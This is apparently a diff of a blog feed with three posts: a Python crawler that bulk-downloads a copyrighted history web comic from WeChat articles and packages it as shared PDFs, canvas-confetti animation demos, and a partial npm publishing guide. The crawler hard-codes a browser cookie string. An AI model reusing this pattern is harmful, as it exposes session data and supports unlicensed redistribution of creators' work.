    69. 发生在1600多年前的一场“无间道”…
    70. 东晋就这么完蛋了…
    71. 五胡十六国是怎么结束的?
    72. 南朝实在太“南”了
    73. 发生在北魏的大女主剧
    74. 北魏汉化组登场
    75. 在北魏,最不值钱的可能是皇帝……
    76. 离南北朝结束还差这一个男人
    77. 南北朝就这么结束了
    78. 隋文帝,这个出道即巅峰的男人
    79. 论一个演员的自我修养
    80. 如果隋朝时有劳动节,那劳动者最怕的就是他……
    81. 影帝的表哥,也是个影帝……
    82. 怂一时风平浪静,绕一步天下我有
    83. 李世民登场!
    84. 李世民的坎坷斗争路
    85. 都是摆摊,为啥李世民能用“烂摊子”发财致富?
    86. 要说乘风破浪的姐姐们,她绝对算一个~
    87. 爬最高的山…杀最亲的崽…最后她得到了想要的一切
    88. 她抄作业,终究抄成了自己最讨厌的人…
    89. 人气高业务棒,实力女主硬邦邦
    90. 唐玄宗登场!姑侄之间的对决!
    91. 大唐盛世,基本就是从这开始的~
    92. 大唐历史上最著名的胖子,没有之一
    93. 前后脚遇到两个大忽悠,唐朝真是头都大了…
    94. 唐朝八年的叛乱,终于被这个猛男结束了
    95. 为什么说男人的嘴骗人的鬼,看看大唐你就懂了…
    96. 大唐它又行了…
    97. 老太监,不讲武德,这样不好…
    98. 彻底压垮唐朝的,是一场对家之间的战争…
    99. 历史不断证明,千万不要惹落榜考生…
    100. 我们100话啦!大唐也快完蛋啦~
    101. 这下大唐真的完蛋了…
    102. 大唐完蛋了,五代十国开始了~
    103. 半路被抓去当皇帝是啥感受?
    104. 炎帝后裔、太阳转世、来自北境的契丹之王!
    105. 他因一己私利,将国家推入深渊…
    106. 当会打仗的吃饱了,末日也就到了
    107. 我愿称之为偷塔之王
    108. 他认真打仗,到头全家被端,只能造反当皇帝了
    109. 这应该是五代里最完美的崽了
    110. 五代都讲了,十国又是怎样的呢?
    111. 拳打南唐美男子,脚踹契丹辽睡王,他真是五代皇帝中的一股清流…
    112. 宋朝开始了~
    113. 五代十国篇结束~咱们下季再见~
    114. 历史喵第十季开更啦!
    115. 那天夜里,他们兄弟俩在屋里发生了什么呢?
    116. 这绝对是辽朝的大女主剧…
    117. 本来想欺负孤儿寡母的,没想到对面是个女王大人…
    118. 大宋又双叒因为想占便宜而翻车了…
    119. 大三角!修罗场!最后结局竟是…
    120. 虽然委屈,但大宋又又又跟人和解了…
    121. 王安石变法
    122. 你相信光吗?反正王安石应该是不信的…
    123. 宋辽夏一起摆烂,结果来了个新家伙…
    124. 70万对2万,优势在我,怎么可能输?
    125. 摊上这样一对父子,大宋南了…
    126. 南宋最强的崽登场!
    127. 南宋最强的崽…也救不了南宋啊…
    128. 我想当个好皇帝,但手握男主剧本的是我堂弟…
    129. 本来只是去劳军,却不小心打了胜仗?
    130. 想挺起腰杆子,可惜实力还是不够啊
    131. 打架打不过,只能拼一些内力…
    132. 一代天骄登场!
    133. 你知道成吉思汗有多强悍吗!
    134. 南宋:老子终于报仇了!
    135. 南宋收复中原了!但…又好像没收…
    136. 建立元朝的那个男人,他来了…….
    137. 南宋结束,大元一统
    138. 《元末明初》篇开更!
    139. 皇位谁来坐?别急先开个会
    140. 怎样形容一个权臣的势力大呢?200多个字的头衔!
    141. 能文能武的富二代,大义灭亲打工仔…
    142. 元朝治好了黄河,却冲走了自己
    143. 大元:教科书式的亡国之君出现了
    144. 元朝的危机解除了,但又似乎没有解除…
    145. 元朝最不该惹的就是这个乞丐
    146. 事实证明,卖鱼的都惹不起啊!
    147. 火烧连环船!这说的可不是赤壁之战
    148. 大元谢幕,大明登场!
    149. 明朝的开局,是地狱难度的
    150. 史上最强太子,就是命太短…
    151. 我只是想把位子坐稳,叔叔们吃点苦怎么啦?
    152. 以一府抗一国,史上最强藩王!
    153. 大明最猛皇帝,天子守国门!
    154. 大明圣孙,明朝文武双全型王者
    155. 大明帝六代,如何一战成名?
    156. 受命于危难之际!为大明续命近两百年!
    157. 几百年前的月圆之夜,他和皇位“团圆” 了
    158. 有个乱糟糟的爹,接手一个乱糟糟的天下…
    159. 他明明拥有天下,却似乎更向往自由…
    160. 本以为扶上位的是个傀儡,没想到是个祖宗……
    161. 说好的宫斗爽剧,怎么就成了修仙模拟器?
    162. 传奇名将登场!戚继光为啥这么猛?
    163. 大明第一首辅,救世宰相的铁血改革路!
    164. 孩子管太紧,长大了可能报复性消费…
    165. 东北“王子”复仇记,女真再次登场!
    166. 后金对大明,萨尔浒之战!
    167. 宁远之战!努尔哈赤的滑铁卢
    168. 江山什么的…哪有木工有趣呀…
    169. 好消息:阉党没了!坏消息:大明也快没了
    170. 仗打赢了,但大明的时间也不多了…
    171. 大明已读不回,贵二代趁机爆改!
    172. 明朝最后的豪赌!赌输了…
    173. 放牛娃建立起的皇朝,被放羊娃给灭了
    174. 从孤儿到最强亲王,小王子的翻身之路
    175. 进了京之后,大顺就开始不顺了
    176. 一个月换俩老板是啥体验?
    177. 明末义军领袖,除了快递员,还有个转业的……
    178. 这个皇帝实习期有点长…
    179. 鳌拜:我全都要!康熙:拿来吧你!
    180. 康熙:我要打三个!
    181. 什么是真正的狠人?是61年每天早起…
    182. 夺嫡大舞台!有种你就来!
    183. 雍正:看我怎么用“不争”赢得胜利!
    184. 虽然工龄短,但工作量大呀!

Output

Crawler

Store the URLs above in a list:

import re

# the Markdown text above (with its original links)
markdown_text = """
1. [如果历史是一群喵](https://mp.weixin.qq.com/s/WVwlW3bhcirBSn2KjsMEYA)
2. [如果历史是一群喵 | 祖先喵们的统一战争](https://mp.weixin.qq.com/s/HwkfqalZD7Ugvpt5lcPyuQ)
3. [吃饭穿衣,竟然都是皇上教的!](https://mp.weixin.qq.com/s/MRvf9c2_8RPX8ouSaNiP1Q)
4. [他年少丧父,被迫子承父业,最后靠湿身建立了一个国家](https://mp.weixin.qq.com/s/l-nWXU45sku88ML4NCjn7Q)
5. [天下都是我家哒!](https://mp.weixin.qq.com/s/PVl-eHCmZSMHLQhm_pRAvw)
6. [跟你讲一下三千多年前的狗血剧](https://mp.weixin.qq.com/s/VoNhyDXoy8Yg-cBCzDcdzg)
...
"""

# extract every URL with a regular expression
urls = re.findall(r'\[.*?\]\((https?://[^\s]+)\)', markdown_text)

Starting from the code in 利用Python爬取公众号上的图片(附源码), then heavily reworked:

from tqdm import tqdm
import requests
from bs4 import BeautifulSoup
import time
import random
import os

headers = {
    'cookie': 'pgv_pvid=6670082751; RK=WMxp6iw+3H; ptcz=831e2d5114bbf9b46ee7956fedb62717ee910417ecd992f3e0027f034213caf1; o_cookie=2925851543; pac_uid=1_2925851543; iip=0; tvfe_boss_uuid=94828b35f56c4131; LW_uid=01d6E8a1d0T8Y6S87134I123O2; eas_sid=J116c8t1G078b6f8N1u4m24059; LW_sid=6166y891k1d2s4h7v9M5A8K6e8; rewardsn=; wxtokenkey=777; wwapp.vid=; wwapp.cst=; wwapp.deviceid=',
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48'
}

index = 0

for url in urls:
    index += 1
    print('第 ' + str(index) + ' 章')
    try:
        # fetch the article page
        response = requests.get(url, headers=headers)
        html = response.text
        soup = BeautifulSoup(html, 'html.parser')
        img_list = soup.find_all('img')
    except Exception as e:
        print(f"{index}:错误 - {str(e)}")
        continue  # skip this chapter if the page could not be fetched

    for img_url in tqdm(img_list):
        try:
            name = str(img_list.index(img_url))
            img_link = img_url.get('data-src')
            if img_link is not None:
                response2 = requests.get(img_link)
                # images are binary data: use .content; .text is for text files
                img_content = response2.content
                # sleep a little so the crawler is not blocked for being too fast
                time.sleep(random.uniform(3, 5))
                # save the file
                folder_path = './如果历史是一群喵/' + '第 ' + str(index) + ' 章'
                if not os.path.exists(folder_path):
                    # create the folder if it does not exist
                    os.makedirs(folder_path)
                with open(folder_path + '/' + name + '.' + img_link.split('=')[-1], 'wb+') as f:
                    f.write(img_content)
        except Exception as e:
            print('第 ' + str(index) + ' 章:错误:' + str(e))

Formatting

The data was cleaned by hand here: the .gif images at the start of some chapters were replaced with .jpeg, and the broken file-name extensions after chapter 162 were fixed as well.

import os

def rename_files_in_folder(folder_path):
    # walk every file in the folder
    for filename in os.listdir(folder_path):
        # build the full file path
        old_file = os.path.join(folder_path, filename)

        if os.path.isfile(old_file):
            # if the extension is .appmsg, change it to .jpeg
            if filename.endswith('.appmsg'):
                new_file = os.path.join(folder_path, filename.replace('.appmsg', '.jpeg'))
                os.rename(old_file, new_file)
            # if the extension is .1, change it to .gif
            elif filename.endswith('.1'):
                new_file = os.path.join(folder_path, filename.replace('.1', '.gif'))
                os.rename(old_file, new_file)

# usage example
folder_path = r'./如果历史是一群喵/第 184 章'  # replace with the target folder
rename_files_in_folder(folder_path)

Pad each scraped image with white on all sides so its aspect ratio matches A4 paper:

import os
import re
from tqdm import tqdm
from PIL import Image

load_path = "./如果历史是一群喵"
save_path = "./如果历史是一群喵 resized"

# A4 portrait size in pixels at 72 DPI
A4_width = 595
A4_height = 840
A4_aspect_ratio = A4_width / A4_height

item_list = os.listdir(load_path)
item_list.sort(key=lambda x: int(re.search(r'第 (\d+) 章', x).group(1)))

# walk the top-level chapter folders
for item in item_list:
    item_path = os.path.join(load_path, item)
    print(item)
    if os.path.isdir(item_path):
        # sort file names numerically by their leading number
        file_list = os.listdir(item_path)
        file_list.sort(key=lambda x: int(re.match(r"(\d+)", x).group(0)))
        # find the first file whose extension is not '.jpeg' and drop it and everything after it
        for i, file in enumerate(file_list):
            if not file.endswith('.jpeg'):
                file_list = file_list[:i]  # slice: keep only the elements before i
                break
        for image_file in tqdm(file_list):
            image = Image.open(os.path.join(item_path, image_file))
            # original width and height
            original_width, original_height = image.size

            # compute the aspect ratio so it can be preserved
            aspect_ratio = original_width / original_height

            # decide how to resize based on the aspect ratio
            if aspect_ratio > A4_aspect_ratio:
                # the image is too wide: use the A4 width and derive the height
                new_width = A4_width
                new_height = int(new_width / aspect_ratio)
            else:
                # the image is too tall: use the A4 height and derive the width
                new_height = A4_height
                new_width = int(new_height * aspect_ratio)

            # resize the image
            resized_image = image.resize((new_width, new_height))

            # create a white A4 background
            background = Image.new('RGB', (A4_width, A4_height), (255, 255, 255))
            # position for centering the image on the A4 background
            left = (A4_width - new_width) // 2
            top = (A4_height - new_height) // 2

            # paste the resized image onto the background
            background.paste(resized_image, (left, top))

            folder_path = os.path.join(save_path, item)
            if not os.path.exists(folder_path):
                # create the folder if it does not exist
                os.makedirs(folder_path)
            background.save(os.path.join(folder_path, image_file), format="JPEG", quality=80)

Exporting PDFs

Turn the images above into PDFs:

from fpdf import FPDF
import re
import os
from tqdm import tqdm

load_path = './如果历史是一群喵 resized/'
save_path = './如果历史是一群喵 pdf/'

# turn a list of image files into one PDF
def images_to_pdf(image_paths, output_pdf_path):
    pdf = FPDF()
    image_paths.sort(key=lambda x: int(re.search(r'(\d+)\.jpeg', x).group(1)))
    # walk every image file
    for image_path in image_paths:
        # add a new page
        pdf.add_page()
        # place the image at A4 size (210mm wide, 297mm tall)
        pdf.image(image_path, x=0, y=0, w=210, h=297)

    # write out the PDF file
    pdf.output(output_pdf_path)

os.makedirs(save_path, exist_ok=True)  # make sure the output folder exists

for folder in tqdm(os.listdir(load_path)):
    image_folder = os.path.join(load_path, folder)
    image_paths = [os.path.join(image_folder, f) for f in os.listdir(image_folder)]

    output_pdf_path = os.path.join(save_path, folder + '.pdf')  # output PDF path
    images_to_pdf(image_paths, output_pdf_path)

The finished files: 如果历史是一群喵 pdf_免费高速下载|百度网盘-分享无限制

/posts/Web-Canvas-Confetti/

Resources

Examples

Basic confetti

    function BasicCannon() {
    confetti({
    particleCount: 100,
    spread: 70,
    origin: { y: 0.6 }
    });
    }

    function RandomDirection() {
    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    confetti({
    angle: randomInRange(55, 125),
    spread: randomInRange(50, 70),
    particleCount: randomInRange(50, 100),
    origin: { y: 0.6 }
    });
    }

    function RealisticLook() {
    var count = 200;
    var defaults = {
    origin: { y: 0.7 }
    };

    function fire(particleRatio, opts) {
    confetti({
    ...defaults,
    ...opts,
    particleCount: Math.floor(count * particleRatio)
    });
    }

    fire(0.25, {
    spread: 26,
    startVelocity: 55,
    });
    fire(0.2, {
    spread: 60,
    });
    fire(0.35, {
    spread: 100,
    decay: 0.91,
    scalar: 0.8
    });
    fire(0.1, {
    spread: 120,
    startVelocity: 25,
    decay: 0.92,
    scalar: 1.2
    });
    fire(0.1, {
    spread: 120,
    startVelocity: 45,
    });
    }

    function Fireworks() {
    var duration = 15 * 1000;
    var animationEnd = Date.now() + duration;
    var defaults = { startVelocity: 30, spread: 360, ticks: 60, zIndex: 0 };

    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    var interval = setInterval(function () {
    var timeLeft = animationEnd - Date.now();

    if (timeLeft <= 0) {
    return clearInterval(interval);
    }

    var particleCount = 50 * (timeLeft / duration);
    // since particles fall down, start a bit higher than random
    confetti({ ...defaults, particleCount, origin: { x: randomInRange(0.1, 0.3), y: Math.random() - 0.2 } });
    confetti({ ...defaults, particleCount, origin: { x: randomInRange(0.7, 0.9), y: Math.random() - 0.2 } });
    }, 250);
    }

    function Stars() {
    var defaults = {
    spread: 360,
    ticks: 50,
    gravity: 0,
    decay: 0.94,
    startVelocity: 30,
    colors: ['FFE400', 'FFBD00', 'E89400', 'FFCA6C', 'FDFFB8']
    };

    function shoot() {
    confetti({
    ...defaults,
    particleCount: 40,
    scalar: 1.2,
    shapes: ['star']
    });

    confetti({
    ...defaults,
    particleCount: 10,
    scalar: 0.75,
    shapes: ['circle']
    });
    }

    setTimeout(shoot, 0);
    setTimeout(shoot, 100);
    setTimeout(shoot, 200);
    }

    function Snow() {
    var duration = 15 * 1000;
    var animationEnd = Date.now() + duration;
    var skew = 1;

    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    (function frame() {
    var timeLeft = animationEnd - Date.now();
    var ticks = Math.max(200, 500 * (timeLeft / duration));
    skew = Math.max(0.8, skew - 0.001);

    confetti({
    particleCount: 1,
    startVelocity: 0,
    ticks: ticks,
    origin: {
    x: Math.random(),
    // since particles fall down, skew start toward the top
    y: (Math.random() * skew) - 0.2
    },
    colors: ['#ffffff'],
    shapes: ['circle'],
    gravity: randomInRange(0.4, 0.6),
    scalar: randomInRange(0.4, 1),
    drift: randomInRange(-0.4, 0.4)
    });

    if (timeLeft > 0) {
    requestAnimationFrame(frame);
    }
    }());
    }

    function SchoolPride() {
    var end = Date.now() + (15 * 1000);

    // go Buckeyes!
    var colors = ['#bb0000', '#ffffff'];

    (function frame() {
    confetti({
    particleCount: 2,
    angle: 60,
    spread: 55,
    origin: { x: 0 },
    colors: colors
    });
    confetti({
    particleCount: 2,
    angle: 120,
    spread: 55,
    origin: { x: 1 },
    colors: colors
    });

    if (Date.now() < end) {
    requestAnimationFrame(frame);
    }
    }());
    }

    function CustomShapes() {
// note: you CAN only use a path for confetti.shapeFromPath(), but for
    // performance reasons it is best to use it once in development and save
    // the result to avoid the performance penalty at runtime

    // pumpkin shape from https://thenounproject.com/icon/pumpkin-5253388/
    var pumpkin = confetti.shapeFromPath({
    path: 'M449.4 142c-5 0-10 .3-15 1a183 183 0 0 0-66.9-19.1V87.5a17.5 17.5 0 1 0-35 0v36.4a183 183 0 0 0-67 19c-4.9-.6-9.9-1-14.8-1C170.3 142 105 219.6 105 315s65.3 173 145.7 173c5 0 10-.3 14.8-1a184.7 184.7 0 0 0 169 0c4.9.7 9.9 1 14.9 1 80.3 0 145.6-77.6 145.6-173s-65.3-173-145.7-173zm-220 138 27.4-40.4a11.6 11.6 0 0 1 16.4-2.7l54.7 40.3a11.3 11.3 0 0 1-7 20.3H239a11.3 11.3 0 0 1-9.6-17.5zM444 383.8l-43.7 17.5a17.7 17.7 0 0 1-13 0l-37.3-15-37.2 15a17.8 17.8 0 0 1-13 0L256 383.8a17.5 17.5 0 0 1 13-32.6l37.3 15 37.2-15c4.2-1.6 8.8-1.6 13 0l37.3 15 37.2-15a17.5 17.5 0 0 1 13 32.6zm17-86.3h-82a11.3 11.3 0 0 1-6.9-20.4l54.7-40.3a11.6 11.6 0 0 1 16.4 2.8l27.4 40.4a11.3 11.3 0 0 1-9.6 17.5z',
    matrix: [0.020491803278688523, 0, 0, 0.020491803278688523, -7.172131147540983, -5.9016393442622945]
    });
    // tree shape from https://thenounproject.com/icon/pine-tree-1471679/
    var tree = confetti.shapeFromPath({
    path: 'M120 240c-41,14 -91,18 -120,1 29,-10 57,-22 81,-40 -18,2 -37,3 -55,-3 25,-14 48,-30 66,-51 -11,5 -26,8 -45,7 20,-14 40,-30 57,-49 -13,1 -26,2 -38,-1 18,-11 35,-25 51,-43 -13,3 -24,5 -35,6 21,-19 40,-41 53,-67 14,26 32,48 54,67 -11,-1 -23,-3 -35,-6 15,18 32,32 51,43 -13,3 -26,2 -38,1 17,19 36,35 56,49 -19,1 -33,-2 -45,-7 19,21 42,37 67,51 -19,6 -37,5 -56,3 25,18 53,30 82,40 -30,17 -79,13 -120,-1l0 41 -31 0 0 -41z',
    matrix: [0.03597122302158273, 0, 0, 0.03597122302158273, -4.856115107913669, -5.071942446043165]
    });
    // heart shape from https://thenounproject.com/icon/heart-1545381/
    var heart = confetti.shapeFromPath({
    path: 'M167 72c19,-38 37,-56 75,-56 42,0 76,33 76,75 0,76 -76,151 -151,227 -76,-76 -151,-151 -151,-227 0,-42 33,-75 75,-75 38,0 57,18 76,56z',
    matrix: [0.03333333333333333, 0, 0, 0.03333333333333333, -5.566666666666666, -5.533333333333333]
    });

    var defaults = {
    scalar: 2,
    spread: 180,
    particleCount: 30,
    origin: { y: -0.1 },
    startVelocity: -35
    };

    confetti({
    ...defaults,
    shapes: [pumpkin],
    colors: ['#ff9a00', '#ff7400', '#ff4d00']
    });
    confetti({
    ...defaults,
    shapes: [tree],
    colors: ['#8d960f', '#be0f10', '#445404']
    });
    confetti({
    ...defaults,
    shapes: [heart],
    colors: ['#f93963', '#a10864', '#ee0b93']
    });
    }

    function Emoji() {
    var scalar = 2;
var unicorn = confetti.shapeFromText({ text: '🦄', scalar });

    var defaults = {
    spread: 360,
    ticks: 60,
    gravity: 0,
    decay: 0.96,
    startVelocity: 20,
    shapes: [unicorn],
    scalar
    };

    function shoot() {
    confetti({
    ...defaults,
    particleCount: 30
    });

    confetti({
    ...defaults,
    particleCount: 5,
    flat: true
    });

    confetti({
    ...defaults,
    particleCount: 15,
    scalar: scalar / 2,
    shapes: ['circle']
    });
    }

    setTimeout(shoot, 0);
    setTimeout(shoot, 100);
    setTimeout(shoot, 200);
    }

    function CustomCanvas(id) {
    var canvas = document.getElementById(id);

    // you should only initialize a canvas once, so save this function
    // we'll save it to the canvas itself for the purpose of this demo
    canvas.confetti = canvas.confetti || confetti.create(canvas, { resize: true });

    canvas.confetti({
    spread: 70,
    origin: { y: 1.2 }
    });
    }
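All of these demo functions assume a global confetti function, i.e. that the canvas-confetti library is already loaded on the page; one common way (the version number is only an example) is the browser build from a CDN:

<script src="https://cdn.jsdelivr.net/npm/canvas-confetti@1.9.3/dist/confetti.browser.min.js"></script>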


    ]]>
    + 资源

    示例

    基础纸屑

    1
    2
    3
    4
    5
    6
    7
    function BasicCannon() {
    confetti({
    particleCount: 100,
    spread: 70,
    origin: { y: 0.6 }
    });
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    function RandomDirection() {
    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    confetti({
    angle: randomInRange(55, 125),
    spread: randomInRange(50, 70),
    particleCount: randomInRange(50, 100),
    origin: { y: 0.6 }
    });
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    function RealisticLook() {
    var count = 200;
    var defaults = {
    origin: { y: 0.7 }
    };

    function fire(particleRatio, opts) {
    confetti({
    ...defaults,
    ...opts,
    particleCount: Math.floor(count * particleRatio)
    });
    }

    fire(0.25, {
    spread: 26,
    startVelocity: 55,
    });
    fire(0.2, {
    spread: 60,
    });
    fire(0.35, {
    spread: 100,
    decay: 0.91,
    scalar: 0.8
    });
    fire(0.1, {
    spread: 120,
    startVelocity: 25,
    decay: 0.92,
    scalar: 1.2
    });
    fire(0.1, {
    spread: 120,
    startVelocity: 45,
    });
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    function Fireworks() {
    var duration = 15 * 1000;
    var animationEnd = Date.now() + duration;
    var defaults = { startVelocity: 30, spread: 360, ticks: 60, zIndex: 0 };

    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    var interval = setInterval(function () {
    var timeLeft = animationEnd - Date.now();

    if (timeLeft <= 0) {
    return clearInterval(interval);
    }

    var particleCount = 50 * (timeLeft / duration);
    // since particles fall down, start a bit higher than random
    confetti({ ...defaults, particleCount, origin: { x: randomInRange(0.1, 0.3), y: Math.random() - 0.2 } });
    confetti({ ...defaults, particleCount, origin: { x: randomInRange(0.7, 0.9), y: Math.random() - 0.2 } });
    }, 250);
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    function Stars() {
    var defaults = {
    spread: 360,
    ticks: 50,
    gravity: 0,
    decay: 0.94,
    startVelocity: 30,
    colors: ['FFE400', 'FFBD00', 'E89400', 'FFCA6C', 'FDFFB8']
    };

    function shoot() {
    confetti({
    ...defaults,
    particleCount: 40,
    scalar: 1.2,
    shapes: ['star']
    });

    confetti({
    ...defaults,
    particleCount: 10,
    scalar: 0.75,
    shapes: ['circle']
    });
    }

    setTimeout(shoot, 0);
    setTimeout(shoot, 100);
    setTimeout(shoot, 200);
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    function Snow() {
    var duration = 15 * 1000;
    var animationEnd = Date.now() + duration;
    var skew = 1;

    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    (function frame() {
    var timeLeft = animationEnd - Date.now();
    var ticks = Math.max(200, 500 * (timeLeft / duration));
    skew = Math.max(0.8, skew - 0.001);

    confetti({
    particleCount: 1,
    startVelocity: 0,
    ticks: ticks,
    origin: {
    x: Math.random(),
    // since particles fall down, skew start toward the top
    y: (Math.random() * skew) - 0.2
    },
    colors: ['#ffffff'],
    shapes: ['circle'],
    gravity: randomInRange(0.4, 0.6),
    scalar: randomInRange(0.4, 1),
    drift: randomInRange(-0.4, 0.4)
    });

    if (timeLeft > 0) {
    requestAnimationFrame(frame);
    }
    }());
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    function SchoolPride() {
    var end = Date.now() + (15 * 1000);

    // go Buckeyes!
    var colors = ['#bb0000', '#ffffff'];

    (function frame() {
    confetti({
    particleCount: 2,
    angle: 60,
    spread: 55,
    origin: { x: 0 },
    colors: colors
    });
    confetti({
    particleCount: 2,
    angle: 120,
    spread: 55,
    origin: { x: 1 },
    colors: colors
    });

    if (Date.now() < end) {
    requestAnimationFrame(frame);
    }
    }());
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    function CustomShapes() {
    // note: you CAN only use a path for confetti.shapeFrompath(), but for
    // performance reasons it is best to use it once in development and save
    // the result to avoid the performance penalty at runtime

    // pumpkin shape from https://thenounproject.com/icon/pumpkin-5253388/
    var pumpkin = confetti.shapeFromPath({
    path: 'M449.4 142c-5 0-10 .3-15 1a183 183 0 0 0-66.9-19.1V87.5a17.5 17.5 0 1 0-35 0v36.4a183 183 0 0 0-67 19c-4.9-.6-9.9-1-14.8-1C170.3 142 105 219.6 105 315s65.3 173 145.7 173c5 0 10-.3 14.8-1a184.7 184.7 0 0 0 169 0c4.9.7 9.9 1 14.9 1 80.3 0 145.6-77.6 145.6-173s-65.3-173-145.7-173zm-220 138 27.4-40.4a11.6 11.6 0 0 1 16.4-2.7l54.7 40.3a11.3 11.3 0 0 1-7 20.3H239a11.3 11.3 0 0 1-9.6-17.5zM444 383.8l-43.7 17.5a17.7 17.7 0 0 1-13 0l-37.3-15-37.2 15a17.8 17.8 0 0 1-13 0L256 383.8a17.5 17.5 0 0 1 13-32.6l37.3 15 37.2-15c4.2-1.6 8.8-1.6 13 0l37.3 15 37.2-15a17.5 17.5 0 0 1 13 32.6zm17-86.3h-82a11.3 11.3 0 0 1-6.9-20.4l54.7-40.3a11.6 11.6 0 0 1 16.4 2.8l27.4 40.4a11.3 11.3 0 0 1-9.6 17.5z',
    matrix: [0.020491803278688523, 0, 0, 0.020491803278688523, -7.172131147540983, -5.9016393442622945]
    });
    // tree shape from https://thenounproject.com/icon/pine-tree-1471679/
    var tree = confetti.shapeFromPath({
    path: 'M120 240c-41,14 -91,18 -120,1 29,-10 57,-22 81,-40 -18,2 -37,3 -55,-3 25,-14 48,-30 66,-51 -11,5 -26,8 -45,7 20,-14 40,-30 57,-49 -13,1 -26,2 -38,-1 18,-11 35,-25 51,-43 -13,3 -24,5 -35,6 21,-19 40,-41 53,-67 14,26 32,48 54,67 -11,-1 -23,-3 -35,-6 15,18 32,32 51,43 -13,3 -26,2 -38,1 17,19 36,35 56,49 -19,1 -33,-2 -45,-7 19,21 42,37 67,51 -19,6 -37,5 -56,3 25,18 53,30 82,40 -30,17 -79,13 -120,-1l0 41 -31 0 0 -41z',
    matrix: [0.03597122302158273, 0, 0, 0.03597122302158273, -4.856115107913669, -5.071942446043165]
    });
    // heart shape from https://thenounproject.com/icon/heart-1545381/
    var heart = confetti.shapeFromPath({
    path: 'M167 72c19,-38 37,-56 75,-56 42,0 76,33 76,75 0,76 -76,151 -151,227 -76,-76 -151,-151 -151,-227 0,-42 33,-75 75,-75 38,0 57,18 76,56z',
    matrix: [0.03333333333333333, 0, 0, 0.03333333333333333, -5.566666666666666, -5.533333333333333]
    });

    var defaults = {
    scalar: 2,
    spread: 180,
    particleCount: 30,
    origin: { y: -0.1 },
    startVelocity: -35
    };

    confetti({
    ...defaults,
    shapes: [pumpkin],
    colors: ['#ff9a00', '#ff7400', '#ff4d00']
    });
    confetti({
    ...defaults,
    shapes: [tree],
    colors: ['#8d960f', '#be0f10', '#445404']
    });
    confetti({
    ...defaults,
    shapes: [heart],
    colors: ['#f93963', '#a10864', '#ee0b93']
    });
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    function Emoji() {
    var scalar = 2;
    var unicorn = confetti.shapeFromText({ text: text, scalar });

    var defaults = {
    spread: 360,
    ticks: 60,
    gravity: 0,
    decay: 0.96,
    startVelocity: 20,
    shapes: [unicorn],
    scalar
    };

    function shoot() {
    confetti({
    ...defaults,
    particleCount: 30
    });

    confetti({
    ...defaults,
    particleCount: 5,
    flat: true
    });

    confetti({
    ...defaults,
    particleCount: 15,
    scalar: scalar / 2,
    shapes: ['circle']
    });
    }

    setTimeout(shoot, 0);
    setTimeout(shoot, 100);
    setTimeout(shoot, 200);
    }

    function CustomCanvas(id) {
    var canvas = document.getElementById(id);

    // you should only initialize a canvas once, so save this function
    // we'll save it to the canvas itself for the purpose of this demo
    canvas.confetti = canvas.confetti || confetti.create(canvas, { resize: true });

    canvas.confetti({
    spread: 70,
    origin: { y: 1.2 }
    });
    }
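
A minimal page to exercise the three demo functions above could look like this (a sketch: the CDN URL, the version, and the confetti-canvas id are assumptions for illustration):

<canvas id="confetti-canvas"></canvas>
<!-- canvas-confetti registers a global `confetti` function when loaded from a CDN -->
<script src="https://cdn.jsdelivr.net/npm/canvas-confetti@1.9.3/dist/confetti.browser.min.js"></script>
<script>
CustomShapes();                  // pumpkin / tree / heart burst
Emoji();                         // emoji burst
CustomCanvas('confetti-canvas'); // burst drawn only inside the canvas above
</script>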


    ]]>
    @@ -195,7 +195,7 @@ /posts/Web-%E5%8F%91%E5%B8%83%E4%B8%80%E4%B8%AA%E5%8C%85%E5%88%B0%20npm/ - 正文

Log in

Create an account on the npm website.

First update npm itself:

npm install -g npm@latest

Point the registry back at the official one (turn the mirror off):

npm config set registry https://registry.npmjs.org/

Try logging in:

npm login
npm notice Log in on https://registry.npmjs.org/
Login at:
https://www.npmjs.com/login?next=/login/cli/XXX
Press ENTER to open in the browser...

After signing in in the browser, you are done.

Project setup

Get the project into shape and create a repository for it on GitHub: GZ-Metal-Cell/hexo-theme-quieter: 🍓 A simple and fully functional Hexo theme, improved based on Hexo theme quiet.

Create the package

Run npm init -y in the project folder to generate a default package.json.

Then edit it into shape:

    {
    "name": "hexo-theme-quieter",
    "version": "1.0.0",
    "description": "🍓A simple and fully functional Hexo theme, improved based on Hexo theme quiet.",
    "main": "package.json",
    "scripts": {
    "test": "echo test"
    },
    "repository": {
    "type": "git",
    "url": "git+https://github.com/GZ-Metal-Cell/hexo-theme-quieter.git"
    },
    "keywords": [
    "hexo",
    "hexo-theme",
    "theme",
    "quieter",
    "simple"
    ],
